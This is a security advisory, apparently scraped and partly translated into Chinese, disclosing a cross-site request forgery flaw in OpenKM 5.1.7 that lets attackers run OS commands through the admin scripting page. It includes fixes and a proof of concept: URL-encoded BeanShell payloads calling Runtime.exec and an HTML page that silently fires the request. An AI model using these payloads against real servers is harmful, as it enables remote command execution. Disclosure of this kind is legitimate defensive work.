COMPASS SECURITY ADVISORY http://HdhCmsTestcsnc.ch/ ######################################################################## 影响产品: OpenKM Document Management System 5.1.7 [1] 开发者: OpenKM http://HdhCmsTestopenkm测试数据/ 主题: Cross-site Request Forgery based OS Command Execution 作者r: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch) 概述: ------------ Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing, Switzerland discovered a web application issue based OS command execution flaw in the OpenKM solution. OpenKM does allow administrative users (having the AdminRole) to run bean shell scripts. Due to the flaw, an attacker could lure an OpenKM administrator to a malicious web page that causes arbitrary OS commands being run in the administrators OpenKM session context. This is possible because OpenKM does not implement access control mechanisms to avoid so called Cross-site Request Forgery [2] (a.k.a. CSRF, XSRF, session riding, forceful browsing). The commands are being executed silently. In the end, this allows an attacker to run OS commands with the privileges of the process owner of the application server (JBOSS). 影响版本 ----------- OpenKM version 5.1.7受影响 5.1.8则没有该问题 修复: ---- To avoid this issue the application must introduce Anti-XSRF tokens for the web-based administrative interface. To avoid arbitrary command execution the admin/scripting. jsp could be removed from the OpenKM.ear before the application is being deployed. Note, the cron job functionality allows to run *.jar and BeanShell scripts as well. 测试证明: -------- Login as administrator (having the AdminRole) and call the URL in a different browser window http://HdhCmsTest2cto测试数据 /OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3 D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp% 2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B Alternatively the administrator could browse a prepared HTML page in a new tab <html> <body> <script> img = new Image() img.src="http://HdhCmsTest2cto测试数据 /OpenKM/admin/scripting.jsp?script=String%5B% 5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3 E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B" </script> </body> </html> The above exploit does nothing else than just creating a file in /tmp String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"}; Runtime.getRuntime().exec(cmd); Some might also want to browse directories http://HdhCmsTest2 cto测试数据 /OpenKM/admin/scripting.jsp?script=import+java.io.*%3B %0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+% 3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++ +DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream% 28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2 9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E% 22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D import java.io.*; try { String ls_str; Process ls_proc = Runtime.getRuntime().exec("/bin/ls -lah"); DataInputStream ls_in = new DataInputStream(ls_proc.getInputStream()); while ((ls_str = ls_in.readLine()) != null) print(ls_str + "<br>"); } catch (IOException e) { } : ----------- [1] OpenKM http://HdhCmsTestopenkm测试数据/ is an Free/Libre document management system that provides a web interface for managing arbitrary files. OpenKM includes a content repository, Lucene indexing, and jBPM workflow. The OpenKM system was developed using Java technology. [2] Cross-site Request Forgery https://HdhCmsTestow asp .org/index.php/Cross-Site_Request_Forgery_(CSRF) CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
查看更多关于OpenKM Document Management System 5.1.7命令执行 - 网站安的详细内容...